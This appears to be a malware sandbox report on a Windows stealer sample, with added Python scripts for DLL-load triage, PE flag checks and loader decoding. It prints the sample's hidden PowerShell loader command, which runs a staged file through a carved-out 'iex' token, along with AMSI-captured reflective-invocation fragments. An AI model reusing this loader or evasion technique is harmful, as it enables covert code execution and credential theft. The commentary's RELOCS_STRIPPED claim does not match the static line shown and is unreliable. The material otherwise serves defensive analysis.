Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe Section loaded: rasadhlp.dll
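The "Section loaded" lines are the most direct evidence of what the injected code does: cmd.exe has no business loading winsqlite3.dll, vaultcli.dll and dpapi.dll (Chromium credential databases, the Windows Credential Manager and DPAPI decryption), nor wininet/winhttp, which is why the report flags browser and mail credential theft. The following is an added example, not part of the sandbox report, that runs that reasoning over the log lines: it groups loaded DLLs per image, maps them to capabilities and reports combinations that the image would not normally need. The DLL-to-capability map and the per-image expectations are the author's assumptions and should be tuned to the estate; the log lines are a constructed subset copied from this page.

```python
"""Per-process DLL-load triage over sandbox "Section loaded" lines."""
import re
from collections import defaultdict

# Constructed input: a subset of the report's "Section loaded" lines.
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dpapi.dll
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe Section loaded: wininet.dll
"""

LINE_RE = re.compile(r"Source:\s+(?P<image>.+?)\s+Section loaded:\s+(?P<dll>\S+)", re.I)

# DLL -> capability it gives the loading process (assumption).
CAPABILITY = {
    "winsqlite3.dll": "sqlite",     # Chromium Login Data / Cookies / History databases
    "vaultcli.dll": "credvault",    # Windows Credential Manager
    "dpapi.dll": "dpapi",           # CryptUnprotectData on stored secrets
    "wininet.dll": "http", "winhttp.dll": "http",
    "schannel.dll": "tls",
    "ieframe.dll": "ie-shell",      # IE/legacy components, used to reach IE stores
    "amsi.dll": "amsi",
}

# Capabilities that are unremarkable for a given image (assumption; extend per estate).
EXPECTED = {
    "powershell.exe": {"http", "tls", "amsi", "dpapi"},
    "firefox.exe": {"sqlite", "http", "tls", "dpapi"},
    "chrome.exe": {"sqlite", "http", "tls", "dpapi"},
    "cmd.exe": set(),
}


def analyze(text):
    """Group DLLs per image and return findings for unexpected capability combinations."""
    loads = defaultdict(set)
    for m in LINE_RE.finditer(text):
        image = m["image"].rsplit("\\", 1)[-1].lower()
        loads[image].add(m["dll"].lower())
    report = {}
    for image, dlls in loads.items():
        caps = {CAPABILITY[d] for d in dlls if d in CAPABILITY}
        unexpected = caps - EXPECTED.get(image, set())
        findings = []
        if {"sqlite", "dpapi"} <= unexpected:
            findings.append("browser credential store access (sqlite + DPAPI) from a non-browser")
        if "credvault" in unexpected:
            findings.append("Windows Credential Manager access")
        if "ie-shell" in unexpected:
            findings.append("IE/legacy shell components loaded")
        if "http" in unexpected and image in ("cmd.exe", "conhost.exe"):
            findings.append("network stack loaded into a shell host (injected code?)")
        elif "http" in unexpected and not image.startswith(("powershell", "firefox", "chrome")):
            findings.append("HTTP client capability in an unknown image")
        report[image] = {"dlls": dlls, "capabilities": caps, "findings": findings}
    return report


def verdict(report):
    """Images whose findings include a credential-store access: stealer candidates."""
    return sorted(i for i, r in report.items()
                  if any("credential" in f.lower() for f in r["findings"]))


if __name__ == "__main__":
    result = analyze(SAMPLE_LINES)
    for image, r in result.items():
        print(image, sorted(r["capabilities"]), r["findings"])
    print("stealer candidates:", verdict(result))
```

The same logic applies to Sysmon event ID 7 (Image loaded) in production: the value is not any single DLL, which most have legitimate uses, but the combination of credential-store and network capabilities in a host that is normally a pure console process.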
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: psiloses.lnk.0.dr LNK file: ..\..\Users\user\Music\forbindingers.Bam132
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\cmd.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
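The two static lines are worth reading together: the file header says RELOCS_STRIPPED while the optional header advertises DYNAMIC_BASE. Without a relocation table the loader cannot rebase the image, so it is mapped at its preferred ImageBase and the ASLR flag buys nothing for the stub. The following is an added example, not part of the sandbox report, that reads both flag words and the base-relocation directory with the standard library only and reports such contradictions. Because the sample itself is not available here, it builds a minimal PE32 header carrying exactly the flags the report lists; on a real file pass the file bytes to pe_flags.

```python
"""Read PE Characteristics / DllCharacteristics and check that DYNAMIC_BASE can apply."""
import struct

FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED", 0x0020: "LARGE_ADDRESS_AWARE", 0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED", 0x1000: "SYSTEM", 0x2000: "DLL",
}
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
IMAGE_DIRECTORY_ENTRY_BASERELOC = 5


def _names(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]


def pe_flags(data):
    """Parse the file header flags, the optional header flags and the reloc directory."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = pe + 4                                    # IMAGE_FILE_HEADER (20 bytes)
    machine, _, _, _, _, _, chars = struct.unpack_from("<HHIIIHH", data, fh)
    oh = fh + 20                                   # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", data, oh)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    pe32 = magic == 0x10B
    image_base = struct.unpack_from("<I" if pe32 else "<Q", data,
                                    oh + 28 if pe32 else oh + 24)[0]
    dll_chars = struct.unpack_from("<H", data, oh + 70)[0]   # same offset in PE32 and PE32+
    dirs = oh + (96 if pe32 else 112)                         # DataDirectory[]
    _, reloc_size = struct.unpack_from("<II", data, dirs + 8 * IMAGE_DIRECTORY_ENTRY_BASERELOC)
    return {
        "machine": machine,
        "image_base": image_base,
        "characteristics": _names(chars, FILE_CHARACTERISTICS),
        "dll_characteristics": _names(dll_chars, DLL_CHARACTERISTICS),
        "has_relocations": reloc_size != 0 and (chars & 0x0001) == 0,
    }


def mitigation_notes(info):
    """Advertised mitigations that cannot take effect given the rest of the header."""
    notes = []
    dc = info["dll_characteristics"]
    if "DYNAMIC_BASE" in dc and not info["has_relocations"]:
        notes.append("DYNAMIC_BASE is set but there is no relocation data: the loader cannot "
                     "rebase the image, so it is mapped at ImageBase 0x%x (no ASLR)"
                     % info["image_base"])
    if "HIGH_ENTROPY_VA" in dc and info["machine"] != 0x8664:
        notes.append("HIGH_ENTROPY_VA is meaningless on a non-x64 image")
    return notes


def sample_header():
    """Constructed PE32 header with the flag words the report shows
    (Characteristics 0x010F, DllCharacteristics 0x8540) and no .reloc directory."""
    buf = bytearray(0x40 + 4 + 20 + 224)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)                     # e_lfanew
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", buf, 0x44, 0x14C, 5, 0, 0, 0, 224, 0x010F)
    oh = 0x44 + 20
    struct.pack_into("<H", buf, oh, 0x10B)                      # PE32 magic
    struct.pack_into("<I", buf, oh + 28, 0x00400000)            # ImageBase
    struct.pack_into("<H", buf, oh + 70, 0x8540)                # DllCharacteristics
    return bytes(buf)


if __name__ == "__main__":
    info = pe_flags(sample_header())
    print(", ".join(info["characteristics"]))
    print(", ".join(info["dll_characteristics"]))
    for n in mitigation_notes(info):
        print("!", n)
```

For a stub that only unpacks and hands off to PowerShell the missing ASLR is not what makes it dangerous, but the same check is useful on the dropped stages and on any binary the loader maps into another process, where a fixed base simplifies the injection code.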
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2075195434.0000000008A34000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2069285687.0000000007840000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615448213.0000000000D1E000.00000002.00000001.01000000.0000000C.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2233571308.0000000000D1E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: Overfondle.exe, 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2067651043.000000002027C000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065314777.00000000200C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2169674706.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.0000000003130000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.00000000032CE000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2164405246.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: Overfondle.exe, 00000008.00000003.2127890263.00000000200C1000.00000004.00000020.00020000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000003.2098058163.000000000047B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Overfondle.exe, Overfondle.exe, 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2067651043.000000002027C000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065314777.00000000200C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000E.00000003.2169674706.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.0000000003130000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.00000000032CE000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2164405246.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: cmd.pdb source: Overfondle.exe, 00000008.00000003.2127890263.00000000200C1000.00000004.00000020.00020000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000003.2098058163.000000000047B000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match File source: 00000002.00000002.2075682584.0000000009E59000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Tilbede $Fremstillede $Halsens), (Bypast @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Presidia152 = [AppDomain]::CurrentDomain.GetAssemblies()$global:Co
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Klovnenumrene)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Vilnis, $false).DefineType($Offentliggrelse
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)"
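The loader command line never names Invoke-Expression: it reads the dropped stage with Get-Content, cuts three characters out of it at offset 18884 (the "iex" alias), and runs that token through the dot (call) operator with the whole file as the argument, so the command line carries no string a keyword rule would catch. The two AMSI fragments above then show the stage building a delegate from a raw function pointer (GetDelegateForFunctionPointer) inside a Reflection.Emit assembly, the usual way to reach VirtualAlloc-class APIs from PowerShell without Add-Type. The following is an added example, not part of the sandbox report or of the malware, that parses the command line, confirms the token against a stand-in stage file and scores script-block text for those indicators. The command line and the AMSI fragments are copied from this page; the stage file is not available, so a constructed stand-in with "iex" planted at that offset is used; the indicator list is the author's choice.

```python
"""Decode an offset-token PowerShell loader and score AMSI script-block fragments."""
import re

# Constructed input: loader command line from the process chain on this page.
LOADER_CMDLINE = (
    "$Indeterminative=Get-Content 'C:\\Users\\user\\AppData\\Local\\Temp\\Moviedom230\\"
    "Enforcedly251\\Afvrgningernes.Ign37';"
    "$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)"
)


def build_stage(offset=18884, token="iex", tail=64):
    """Constructed stand-in for the stage file: filler with the token at `offset`."""
    body = bytearray(b"#" * (offset + tail))
    body[offset:offset + len(token)] = token.encode()
    return bytes(body)


INVOKE_ALIASES = {"iex": "Invoke-Expression", "icm": "Invoke-Command", "saps": "Start-Process"}

# $buf = Get-Content '<path>' ... $tok = $buf.SubString(off,len) ... .$tok($buf)
LOADER_RE = re.compile(
    r"\$(?P<buf>\w+)\s*=\s*Get-Content\s+'(?P<path>[^']+)'.*?"
    r"\$(?P<tok>\w+)\s*=\s*\$(?P=buf)\.SubString\((?P<off>\d+),\s*(?P<len>\d+)\).*?"
    r"[.&]\s*\$(?P=tok)\s*\(\s*\$(?P=buf)\s*\)", re.I | re.S)


def parse_loader(cmdline):
    """Return the stage path and the (offset, length) of the command token, or None."""
    m = LOADER_RE.search(cmdline)
    if not m:
        return None
    return {"path": m["path"], "offset": int(m["off"]), "length": int(m["len"]),
            "buffer_var": m["buf"], "token_var": m["tok"]}


def resolve_token(info, stage_bytes):
    """Cut the token out of the stage file and name the cmdlet it aliases (None if unknown)."""
    tok = stage_bytes[info["offset"]:info["offset"] + info["length"]].decode("latin-1")
    return tok, INVOKE_ALIASES.get(tok.lower())


# Script-block indicators for the reflective P/Invoke pattern AMSI recorded (assumption).
INDICATORS = {
    "GetDelegateForFunctionPointer": "native function pointer turned into a callable delegate",
    "DefineDynamicAssembly": "in-memory assembly built with Reflection.Emit",
    "AssemblyBuilderAccess": "Reflection.Emit usage",
    "GetAssemblies": "walks loaded assemblies to reach unexported P/Invoke signatures",
    "[IntPtr]": "raw pointer types in a script",
    ".SubString(": "token carved out of a buffer at a fixed offset",
}


def scriptblock_indicators(text):
    t = text.lower()
    return [k for k in INDICATORS if k.lower() in t]


# Constructed input: the two AMSI fragments quoted in this section.
AMSI_FRAGMENTS = [
    "GetDelegateForFunctionPointer((Tilbede $Fremstillede $Halsens), (Bypast @([IntPtr], "
    "[UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Presidia152 = "
    "[AppDomain]::CurrentDomain.GetAssemblies()$global:Co",
    "DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Klovnenumrene)), "
    "[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Vilnis, "
    "$false).DefineType($Offentliggrelse",
]

if __name__ == "__main__":
    info = parse_loader(LOADER_CMDLINE)
    token, cmdlet = resolve_token(info, build_stage())
    print(f"stage: {info['path']}\ntoken @{info['offset']}: {token!r} -> {cmdlet}")
    for frag in AMSI_FRAGMENTS:
        print(scriptblock_indicators(frag))
```

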